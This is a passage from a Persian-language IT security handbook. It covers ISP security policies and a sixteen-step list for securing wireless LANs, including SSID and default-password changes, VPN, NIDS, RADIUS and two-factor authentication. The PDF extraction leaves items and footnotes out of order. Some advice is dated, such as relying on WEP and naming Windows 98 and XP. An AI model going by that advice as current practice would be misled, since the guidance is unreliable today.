ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ ،ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ.
ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ
ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ ،ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ
ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ.
ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ،ﻭ .(...
•
ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ
ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥISP ،ﻫـﺎﻱ
ﻫﻤﺘﺎ ،ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ،ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ
ﺍﻳﻨﺘﺮﻧﺖ.
•
ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ .ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ
ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ISPﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ
ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ ،ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ
ﻧﻤﺎﻳﻴﺪ.
•
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ISPﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ
ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ
ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ.
•
ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ ) ٢٠٦(AUPﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ
ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ISPﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
•
ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ
ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ
ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ
ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ
ﺑﺎﺷﻨﺪ.
•
ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ
ﻣﺪﻳﺮﻳﺖ ،ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭﺏ ،ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ Proxy ،ﻭ (DNSﻭ ﺗﻤــﺎﻡ
ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ
ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻴﺪ.
206 Acceptable Use Policy
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ
٢١١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ
ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ.
ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ WLAN
ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ
ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ :ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ،ﺑﻮﺩﺟﻪ ،ﻣﻨﺎﺑﻊ ،ﻭ ﺯﻣﺎﻥ
ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ .ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ
ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ.
ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ .ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ
ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ
ﺍﺳﺖ ،ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ
ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ:
.۲
ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ
WLANﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ
ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ.
.۳
ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ
ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ.
.۴
ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ
ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ
ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺻﻮ ﹰ
ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ.
.۵
ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ
ﺍﻃﻼﻋــﺎﺕ SSIDﻳــﺎ ﺁﺩﺭﺱ IPﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ
ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ SSID .ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ
ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ ،ﺑﺨــﺸﻬﺎ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ
ﻣـﺸﺨﺺ ﻛﻨــﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ SSID
ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ ،ﺑـﻪ
ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ WEPﺭﺍ ﺑـﺸﻜﻨﺪ ،ﺑﺮﺍﺣﺘـﻲ
ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ
ﻛﺮﺩﻩ ﺍﺳﺖ.
.۶
ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ
ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ
ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ
.۸
ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ ،ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ.
ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ
ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ
ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ۲،۴ﮔﻴﮕـﺎﻫﺮﺗﺰ
ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ ،ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
.۹
WEPﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ
WEPﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ
٢٠٧
ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ.
.۱۰
ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ،ﺍﺯ ﺗﻮﻧـﻞ VPN
ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ .ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ VPNﻣﻲﺑﺎﺷـﺪ ،ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ،
ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ VPNﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ
ﻣﺜـﻞ ،Windows 2000 ،Windows 98 SEﻭ
Windows XPﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ.
.۱۱ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ
٢٠٩
ﺷﺒﻜﻪ ) ٢٠٨(NIDSﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ.
.۱۲ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ
ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ.
۲۰۷ﻣﻨﺒﻊNIPC :
http://www.nipc.gov/publications/nipcpub/best
pract.html
208 Network Based Intrusion Detection System
۲۰۹ﻣﻨﺒﻊ ،Chris Bateman :ﺗﺤﻠﻴﻠﮕﺮ CERT
ﺑﺨﺶ ﺳﻮﻡ
.۱
ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ
ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ.
.۷
ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ
ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ
ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ ،ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛
ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ
ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ
ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ.
٢١٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
.۱۳ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ ٢١٠ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ،
ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ .ﺩﻭ
ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ .ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ
ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ
ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ ٢١١.ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ٢١٢RADIUSﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ
ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ .ﺩﺭ ﺣﻘﻴﻘﺖ
ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ RADIUSﻣﺜـﻞ
٢١٣
ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ ،ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ.
.۱۴ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ gatewayﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ ٢١٤.ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ
ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ ٢١٥ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ
ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ
ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﻣﺜــﻞ IPSecﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ VPNﺍﺳــﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ
ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ
210 Two Factor Authentication
Bateman ۲۱۱ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ e-thenticator
ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ،ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ
ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ.
212 Remote Authentication Dial-In User Service
RADIUS ۲۱۳ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"،
ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ
